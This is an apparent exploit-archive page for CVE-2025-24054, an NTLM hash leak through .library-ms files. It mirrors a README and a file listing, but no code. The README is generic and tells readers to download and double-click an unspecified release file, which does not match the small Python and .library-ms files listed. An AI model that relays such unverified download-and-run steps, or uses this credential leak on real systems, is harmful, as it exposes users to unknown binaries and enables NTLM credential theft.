Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1020 CNY

100%

CVE-2025-24054 PoC — NTLM Hash Disclosure Spoofing Vulnerability

Source
Associated Vulnerability
Title:NTLM Hash Disclosure Spoofing Vulnerability (CVE-2025-24054)
Description:External control of file name or path in Windows NTLM allows an unauthorized attacker to perform spoofing over a network.
Description
🛠️ Exploit NTLM hash leaks via `.library-ms` files on unpatched Windows systems for research with this proof of concept and setup instructions.
Readme
# 🛡️ CVE-2025-24054_CVE-2025-24071-PoC - Simple Tool for Enhanced Security Awareness

[![Download Now](https://img.shields.io/badge/Download_Now-%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20-blue)](https://github.com/yum1ra/CVE-2025-24054_CVE-2025-24071-PoC/releases)

## 📜 Description

CVE-2025-24054_CVE-2025-24071-PoC is a proof of concept tool designed to demonstrate the NTLM hash leak vulnerability present via the .library-ms files. This software provides a straightforward way to understand and explore the implications of these vulnerabilities, promoting better awareness of security practices in Windows environments.

## 🚀 Getting Started

Follow these simple steps to download and run our software. 

### 🛠️ System Requirements

- **Operating System**: Windows 10 or later
- **Memory**: 2 GB RAM or more recommended
- **Storage**: At least 50 MB free space
- **Network**: Internet connection for downloading the tool

### 📥 Download & Install

To get started, you can download the application from our releases page. 

[Visit this page to download](https://github.com/yum1ra/CVE-2025-24054_CVE-2025-24071-PoC/releases).

1. Click the link above to go to the Releases page.
2. Look for the latest version.
3. Choose the appropriate file for your system and click on it to download.
4. Save the file to a location on your computer where you can easily find it.

### 💻 Running the Application

After downloading, you will need to run the application:

1. Navigate to the location where you saved the downloaded file.
2. Double-click on the file to start the application.
3. Follow any prompts that appear on your screen to proceed.
4. The tool will launch, and you can begin exploring its features.

## 🔍 Features

- **Demonstrates Vulnerabilities**: Understand how NTLM hash leaks can occur.
- **User-Friendly Interface**: Designed for ease of navigation.
- **Informative Output**: Learn about the risks associated with these vulnerabilities.

## ⚙️ Usage Instructions

1. Upon launching the application, you will see a clean interface.
2. Click on the “Start Demonstration” button to begin.
3. Follow the on-screen instructions to simulate the exploitation process.
4. Review the results and insights provided by the application.

## 📝 Important Notes

- Ensure your system is updated for best performance.
- Use this tool for educational purposes only. 
- Avoid running the tool in production environments.

## 📞 Support & Contact

If you encounter any issues or need assistance, feel free to reach out. You can submit an issue on GitHub via the [Issues section](https://github.com/yum1ra/CVE-2025-24054_CVE-2025-24071-PoC/issues). 

## 🕵️‍♂️ Related Topics

This tool relates to several important topics in cybersecurity. It covers:

- CVE-2025-24054 and CVE-2025-24071 vulnerabilities
- NTLM protocol and its security implications
- Basic phishing awareness
- Exploits and their potential impact on users

By understanding these areas, users can better protect themselves and their information online.

For more information, visit our [Releases page](https://github.com/yum1ra/CVE-2025-24054_CVE-2025-24071-PoC/releases) again to ensure you are using the most updated version and accessing the latest documentation. 

Stay safe online!
File Snapshot

[4.0K] /data/pocs/5c57619a1ad09a6c65afe6017b320fd4172cf7a9 ├── [ 693] exploit.py ├── [3.2K] README.md └── [ 364] xd.library-ms 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →